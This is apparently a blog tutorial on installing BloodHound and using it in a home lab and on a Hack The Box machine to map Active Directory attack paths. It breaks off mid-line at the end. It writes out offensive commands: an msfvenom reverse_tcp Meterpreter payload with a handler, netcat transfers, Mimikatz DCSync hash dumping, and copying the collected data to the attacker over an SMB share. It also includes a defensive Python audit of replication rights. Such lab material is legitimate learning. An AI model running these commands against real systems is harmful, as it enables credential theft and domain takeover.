
Active Directory BloodHound Walkthrough – A Windows Active Directory forest can get frankly enormous, and in the world of AD security it can be hard to tell the trees from the forest (pun intended). Luckily for both pentesting professionals and security responders, there is a tool for that. Discovering and graphically representing the trust relationships between users and the objects they interact with in Active Directory is where BloodHound shines. Here’s how to ethically hack Active Directory with BloodHound.

BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell/C# ingestor.

https://github.com/BloodHoundAD/Bloodhound/wiki

Installing BloodHound can be a nightmare when following most of the available online documentation. That is the reason this post was made: to make it convenient and repeatable for me. Originally I assumed I would have to install Node.js and npm, but luckily I found an insanely easier way to get BloodHound. Even the documentation suggests using it over its own method for most operating systems. However, here is the best link I have found for doing the former anyway: link (how to install Node.js on Kali Linux). What the guide explains is using Node Version Manager to install Node.js and npm. As far as that goes, it is the preferred method.

# check that the two tools are installed (one command per line)
root@kali: node -v
root@kali: npm -v

Here’s What You Need

Don’t have a 2016 Domain Controller virtual machine yet? See the easy guide for setting up the 2016 Server.

  • Windows 7 Virtual Machine
  • Kali Linux Virtual Machine
  • Windows 2016 Server Virtual Machine
    • DNS, AD DS, DHCP Roles Enabled

Networking

Using VirtualBox, the only network adapter we are using is the internal network, intnet. The 2016 server is acting as the DHCP server while the other virtual hosts are DHCP clients, so they receive IP addresses in this little virtual subnet, 10.0.0.1/24.

Installation

The very easiest way to install Bloodhound is outlined in this guide. However, for convenience these are the steps:

# get bloodhound, yep
sudo apt-get install bloodhound
# launch the neo4j db
neo4j console
2019-04-03 21:47:50.086+0000 INFO  Remote interface available at http://localhost:7474/

You will now see the web interface for neo4j. Log in with the default credentials (username neo4j, password neo4j) and you will be prompted to change the password.


With the neo4j web interface still open, run the command to start BloodHound.

# run BloodHound
bloodhound
This is the BloodHound web application.

Get Active Directory Data

Now the next step is to ingest data into the BloodHound web application. For that we need SharpHound, the “C# rewrite of the BloodHound Ingestor”, meaning a new and improved ingestor; in other words, a better way to get data from Active Directory into our BloodHound web application. There are some stealth options, but I am focusing on collecting everything for this run.

Sharphound is written using C# 7.0 features. To easily compile this project, use Visual Studio 2017.


Building the project will generate an executable as well as a PowerShell script that encapsulates the executable. All dependencies are rolled into the binary.

https://github.com/BloodHoundAD/SharpHound

On the Windows 7 machine (make sure it’s domain-joined) run the program.

# run the C# ingestor; this will dump the .zip file we need for the UI
C:\Users\skippy\SharpHound.exe --DomainController 10.0.0.21 -c All 
....Compressing data to .\29084334_BloodHound.zip
You can upload this file directly to the UI.

Get the Data to BloodHound

There are many options but these are simple.

  • using netcat
  • using a meterpreter shell
  • Remote desktop from Kali Linux

Using netcat we can move files between hosts.

meterpreter > shell
C:\Users\skippy\Desktop>nc.exe -nvlp 6600 > netcat.exe
root@kali:~ nc -nv 10.0.0.7 6600 < /usr/share/windows-binaries/nc.exe

Using meterpreter, this is how to leverage the upload and download functions.

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\System32\\nc.exe
[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\Windows\System32
[*] Uploaded 58.00 KiB of 58.00 KiB (100.0%): /usr/share/windows-binaries/nc.exe -> C:\Windows\System32\nc.exe
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\Windows\System32\nc.exe

Here’s the long way to get the file from the Windows machine back to the attacker machine, Kali. This requires some manual interaction, but it is still pretty quick.

root@kali:~ systemctl start postgresql
root@kali:~ msfdb init
root@kali:~ msfconsole
msf > workspace -a scenario_1
msf > workspace scenario_1
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip address> -f exe -o /var/www/reverse_shell.exe
msf > cd /var/www
msf > python -m SimpleHTTPServer 8000
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST <kali ip address>
msf5 exploit(multi/handler) > run
meterpreter > download 20190343455_BloodHound.zip /root

There is a quicker way to run all these commands in a script, a resource script.

# same as doing each command individually
root@kali: msfconsole -r get_a_shell.rc

Using rdesktop on Kali Linux.

root@kali: rdesktop -u skippy -p password <win ip address>

After ingesting the JSON data, BloodHound is good to go!

Queries


We can see all the details for each user. Not only that, this information is also available for each host that is part of the domain-joined network.


Of the pre-built queries there is one particularly useful expression, Find Principals with DCSync rights. I cover the DCSync attack using Mimikatz in a previous post. Basically it means that a principal has the right to replicate AD information. These rights should only exist for the default privileged groups (Enterprise Admins, Domain Admins, etc.), but sometimes other principals have them. Leveraging this information helps determine high-value users as targets in this stage of a pentest.

// request SeDebugPrivilege for the current process
mimikatz # privilege::debug
// ask the DC to replicate the account's secrets (password hashes) via DCSync
mimikatz # lsadump::dcsync /domain:ethicalhackingguru /user:skippy

Change Graph View

By changing the layout type, you can see a different view that is a little easier to follow.

The path goes from a regular AD user, Skippy, to the Domain Controller (shown as a red computer).

HTB Forest Bloodhound Example

I would be remiss not to include a practical example from a great service, Hack The Box. I am using the Invoke-Bloodhound.ps1 script, which executes in memory, leaving nothing written to disk.

I am loading it in an evil-winrm shell, but you could upload the script and use it that way too.

Invoke-Bloodhound -CollectionMethod All -LDAPUser Svc-account -LDAPPass passw0rd

How Do I Move the Zip Back to Kali?

So you have the output of Invoke-Bloodhound.ps1, but how do you move it back to the Kali box? You can try Netcat, but what a pain in the ass, so really there is a better way.

That way is starting Impacket’s smbserver.py on Kali (smbserver.py kali .) and then mounting that share from the Windows target.

# on Kali: share the current directory under the share name "kali"
root@kali: smbserver.py kali .
# on the Windows target: mount that share as Z: and copy the zip over
C:\> net use z: \\<kali ip address>\kali
C:\> copy *.zip z:

And on the Kali side that activity looks like this below.

It also helps to right-click a node and mark it as owned, so that the overall progression is evident.

My owned service account is part of the Exchange Windows Permissions group, which has the WriteDACL permission, which means I can add ACLs to domain objects.

What that means is that I can add a domain user to that group and grant it the DCSync privilege for exploitation.
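As an added audit example (not code from this post or from the BloodHound project), the following Python walks SharpHound-style JSON to compute which users end up with the domain rights that the DCSync query above and the Exchange Windows Permissions path are looking for, pushing group-held rights down through nested membership. The field names and the sample data are assumed/constructed, not real collector output.

```python
import json
from collections import defaultdict

# Constructed sample shaped like SharpHound's groups.json / domains.json
# (assumed field names; not real collector output).
D = "@EXAMPLE.LOCAL"
GROUPS_JSON = json.dumps({"groups": [
    {"Properties": {"name": "EXCHANGE WINDOWS PERMISSIONS" + D},
     "Members": [{"MemberName": "SVC-ACCOUNT" + D, "MemberType": "User"}]},
    {"Properties": {"name": "ENTERPRISE ADMINS" + D},
     "Members": [{"MemberName": "DOMAIN ADMINS" + D, "MemberType": "Group"}]},
    {"Properties": {"name": "DOMAIN ADMINS" + D},
     "Members": [{"MemberName": "ADMINISTRATOR" + D, "MemberType": "User"}]}]})
DOMAINS_JSON = json.dumps({"domains": [{"Properties": {"name": "EXAMPLE.LOCAL"}, "Aces": [
    {"PrincipalName": "ENTERPRISE ADMINS" + D, "PrincipalType": "Group", "RightName": "GetChanges"},
    {"PrincipalName": "ENTERPRISE ADMINS" + D, "PrincipalType": "Group", "RightName": "GetChangesAll"},
    {"PrincipalName": "EXCHANGE WINDOWS PERMISSIONS" + D, "PrincipalType": "Group", "RightName": "WriteDacl"},
    {"PrincipalName": "SKIPPY" + D, "PrincipalType": "User", "RightName": "GetChanges"}]}]})

def load_members(groups_json):
    """Map each group name to its direct members as (name, type) pairs."""
    return {g["Properties"]["name"]: [(m["MemberName"], m["MemberType"]) for m in g["Members"]]
            for g in json.loads(groups_json)["groups"]}

def resolve_users(principal, ptype, members, seen=None):
    """Expand a principal to the users it ultimately contains, following nested groups."""
    if ptype != "Group":
        return {principal}
    seen = set() if seen is None else seen
    if principal in seen:  # guard against cyclic group nesting
        return set()
    seen.add(principal)
    return set().union(*(resolve_users(n, t, members, seen) for n, t in members.get(principal, [])))

def effective_domain_rights(domains_json, groups_json):
    """{user: rights on the domain object}, with rights held via groups pushed down to users."""
    members, rights = load_members(groups_json), defaultdict(set)
    for dom in json.loads(domains_json)["domains"]:
        for ace in dom["Aces"]:
            for user in resolve_users(ace["PrincipalName"], ace["PrincipalType"], members):
                rights[user].add(ace["RightName"])
    return dict(rights)

def dcsync_capable(rights):
    """DCSync needs both replication rights on the domain; one alone is not enough."""
    return sorted(u for u, r in rights.items() if {"GetChanges", "GetChangesAll"} <= r)

def writedacl_capable(rights):
    """WriteDacl on the domain lets a principal grant itself the replication rights."""
    return sorted(u for u, r in rights.items() if "WriteDacl" in r)
```

Anyone listed by either function who is not a member of the default privileged groups is exactly the finding the pre-built query surfaces in the graph.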

ACLPwn Tutorial

These two tools go hand in hand. Aclpwn will automatically read the BloodHound files and locate possible paths for exploitation. You can then use it to exploit the path you choose.

To start aclpwn you first have to start the neo4j console; then you can use it, and I usually have to specify the db credentials.

error: